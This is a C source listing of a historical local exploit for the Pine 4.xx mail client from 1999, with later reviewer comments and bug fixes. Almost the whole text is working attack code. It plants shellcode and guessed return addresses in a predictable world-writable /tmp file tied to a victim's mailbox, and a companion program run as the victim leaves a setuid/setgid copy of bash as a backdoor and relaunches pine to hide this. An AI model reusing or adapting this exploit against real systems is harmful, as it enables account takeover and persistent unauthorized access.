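/* UNOFFICIAL exploit for Pine 4.xx [2000] */
/* Ripped from two txts ... lcamtuf's and Aleph1's :-) [2000] */
/* by z33d -- z33d@lighting.ml.org [2000] */
/* If this doesn't work, tune it with GDB - the best debugger ;-) [2000] */
/* because we don't know where this buffer will land in memory :-( [2000] */
/* I tested on RH 5.1 ( :-] ) [2000] */
/* Oh, and you must first send some mail to -luser- [2000] */
/*
 * Date: Fri, 9 Apr 1999 12:18:06 -0000
 * From: Maurycy Prodeus
 * To: BUGTRAQ@netspace.org
 * Subject: Pine 4.xx exploit
 *
 * Hi ... I wrote an exploit for Pine 4.xx, but perhaps it doesn't work well
 * on some computers ... you must use gdb and practice on a non-root user ...
 * Put wc.c in /tmp and compile:  gcc wc.c -o wc
 * Next compile explpine.c (-o explpine, or change [ killall -9 explpine ]
 * in wc.c). Run this ... Send some mail to -luser- and wait wait wait ...
 */

/*
 * Reviewer notes (historical listing, kept for reference):
 *  - What this program does, as visible below: it stats LUSER's mailbox in
 *    /var/spool/mail, derives the name /tmp/.<st_dev>.<st_ino> from it,
 *    creates that file world-writable (0666) and keeps rewriting it with a
 *    NOP sled + 32-bit Linux shellcode that execve()s /tmp/wc, followed by a
 *    run of guessed 4-byte return addresses, while holding an flock() on it.
 *    Presumably Pine 4.xx opened a temp/lock file of that name for the
 *    mailbox and copied its contents into a fixed-size stack buffer; the
 *    vulnerable Pine code is not part of this listing, so that is inferred
 *    from the author's comments, not shown here.
 *  - The shellcode uses int 0x80 and the payload assumes 4-byte addresses on
 *    the target; the payload is now written byte-wise so the harness does not
 *    depend on sizeof(long) of the host it is compiled on (the original wrote
 *    `long`s in 4-byte steps, overflowing its own buffer on LP64 hosts).
 *  - Other fixes: the "#include" lines had lost their header names in this
 *    listing and are restored; the address/return-address copy loop wrote one
 *    byte past the allocation; open() was not checked before use; get_sp()
 *    relied on a missing return statement; exit status 0 was used on errors.
 */

#define _DEFAULT_SOURCE 1   /* expose fsync/ftruncate/flock under strict -std= modes */

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <unistd.h>

#define DEFAULT_DISTANCE    0xe98   /* guessed offset from our stack pointer to the target's buffer */
#define DEFAULT_BUFFER_SIZE 600     /* bytes of repeated return address */
#define DEFAULT_EGG_SIZE    576     /* NOP sled + shellcode; for lame: mod 4 = 0 !!!!!!!!! */
#define NOP 0x90
#define LUSER "root"                /* victim: owner of the mailbox being targeted */

/* 32-bit Linux execve("/tmp/wc", ["/tmp/wc"], NULL) followed by exit(1).
 * The jmp/call pair locates the path string in place; the code itself
 * NUL-terminates the path (xor eax,eax; mov [esi+7],al). */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/tmp/wc";

/* Current stack pointer, used as the base for guessing where the target's
 * buffer lands. The original had no return statement and relied on the
 * value being left in %eax (undefined behavior); an output operand is used
 * instead. x86 only, as the shellcode is. */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__ volatile("movl %%esp, %k0" : "=r"(sp));
    return sp;
}

/* Fill out[0 .. egg_size + buf_size) with the egg (NOP sled ending in the
 * shellcode) followed by buf_size bytes of `addr` as a repeated 4-byte
 * little-endian value. The shellcode sits one byte before the end of the
 * egg, as in the original layout; the final egg byte is a NOP instead of
 * being left uninitialized. Returns 0 if the egg is too small to hold the
 * shellcode, 1 otherwise. */
static int build_payload(unsigned char *out, size_t egg_size, size_t buf_size,
                         unsigned long addr)
{
    size_t sc_len = strlen(shellcode);
    size_t i;

    if (egg_size < sc_len + 1) {
        return 0;
    }

    memset(out, NOP, egg_size);
    memcpy(out + (egg_size - sc_len - 1), shellcode, sc_len);

    /* written byte-wise: the target is i386, the host may be anything */
    for (i = 0; i + 4 <= buf_size; i += 4) {
        unsigned char *p = out + egg_size + i;
        p[0] = (unsigned char)(addr);
        p[1] = (unsigned char)(addr >> 8);
        p[2] = (unsigned char)(addr >> 16);
        p[3] = (unsigned char)(addr >> 24);
    }
    return 1;
}

/* Entry point: builds the payload, creates the per-mailbox file in /tmp and
 * rewrites it once a second forever (the victim's Pine is expected to pick
 * it up). Returns 1 on any setup failure; otherwise never returns. */
int main(int argc, char *argv[])
{
    const size_t bsize = DEFAULT_BUFFER_SIZE;
    const size_t eggsize = DEFAULT_EGG_SIZE;
    unsigned char *payload;
    unsigned long addr;
    char path[100];
    struct stat st;
    int fd;
    int first = 1;

    (void)argc;
    (void)argv;

    payload = malloc(bsize + eggsize);
    if (!payload) {
        printf("Can't allocate memory.\n");
        return 1;
    }

    addr = get_sp() - DEFAULT_DISTANCE;
    printf("Using address: 0x%lx\n", addr);

    if (!build_payload(payload, eggsize, bsize, addr)) {
        printf("Egg size %lu too small for the shellcode.\n", (unsigned long)eggsize);
        free(payload);
        return 1;
    }

    snprintf(path, sizeof path, "/var/spool/mail/%s", LUSER);
    if (stat(path, &st) != 0) {
        printf("Mailbox (%s) not found.\n", path);
        free(payload);
        return 1;
    }

    /* The target file name is derived from the mailbox's device and inode
     * numbers; presumably this matches Pine's temp/lock file naming
     * (not shown in this listing). */
    snprintf(path, sizeof path, "/tmp/.%x.%x", (unsigned)st.st_dev, (unsigned)st.st_ino);

    /* O_CREAT without O_EXCL on a predictable /tmp name: whoever creates or
     * symlinks it first wins. Kept as in the original. */
    fd = open(path, O_RDWR | O_CREAT, 0600);
    if (fd < 0) {
        perror(path);
        free(payload);
        return 1;
    }
    /* Deliberately world-writable, as in the original. */
    if (fchmod(fd, 0666) != 0) {
        perror("fchmod");
    }

    for (;;) {
        lseek(fd, 0, SEEK_SET);
        if (write(fd, payload, bsize + eggsize) != (ssize_t)(bsize + eggsize)) {
            perror("write");
        }
        if (ftruncate(fd, (off_t)(bsize + eggsize)) != 0) {
            perror("ftruncate");
        }
        fsync(fd);
        printf("Tieeeee %lx\n", addr + DEFAULT_DISTANCE);
        /* the lock is attempted only on the first pass, as in the original */
        if (first) {
            first = 0;
            if (flock(fd, LOCK_EX) == 0) {
                printf("Got lock on %s.\n", path);
            } else {
                printf("File %s already locked, wait...\n", path);
            }
        }
        sleep(1);
    }
}

/* --------------end of explpine.c---------------------------------------- */
/* wc.c is the program that will be run by -luser-'s pine ... */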
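/* --------------wc.c------------------------ */
/*
 * Payload executed by the victim's Pine as -luser- (see explpine.c): it
 * leaves a copy of bash with the set-id bits in /tmp, stops the exploit
 * harness, and then starts the real pine so the session looks normal.
 * The "#include" line had lost its header name in this listing; stdlib.h
 * (system, putenv) and unistd.h (execl) are what the body needs.
 */
#include <stdlib.h>
#include <unistd.h>

#define LUSER "z33d"   /* presumably the attacker's own username/group; the copied shell is chgrp'd to it */

int main(void)
{
    /* Each command runs through /bin/sh via system(), so cp/chgrp/chmod are
     * resolved via the victim's PATH. /tmp/mc666 is created by, and so owned
     * by, the user pine runs as; "chmod +s" sets both the setuid and setgid
     * bits on it.
     * NOTE(review): bash drops its effective uid to the real uid at startup
     * unless started with -p; whether the copy keeps its privileges depends
     * on the bash build on the target — not shown here. */
    system("cp /bin/bash /tmp/mc666");
    system("chgrp "LUSER" /tmp/mc666");
    system("chmod +s /tmp/mc666");
    /* stop the harness so it no longer rewrites the temp/lock file */
    system("/usr/bin/killall -9 explpine");
    putenv("TERM=linux");
    /* Hand over to the real pine. The argument list must end in a
     * (char *)NULL, not a bare 0, which is not guaranteed to be
     * pointer-sized when passed through the varargs. */
    execl("/usr/bin/pine", "pine", (char *)NULL);
    return 1;   /* only reached if execl fails */
}
/* -------------end of wc.c-------------------- */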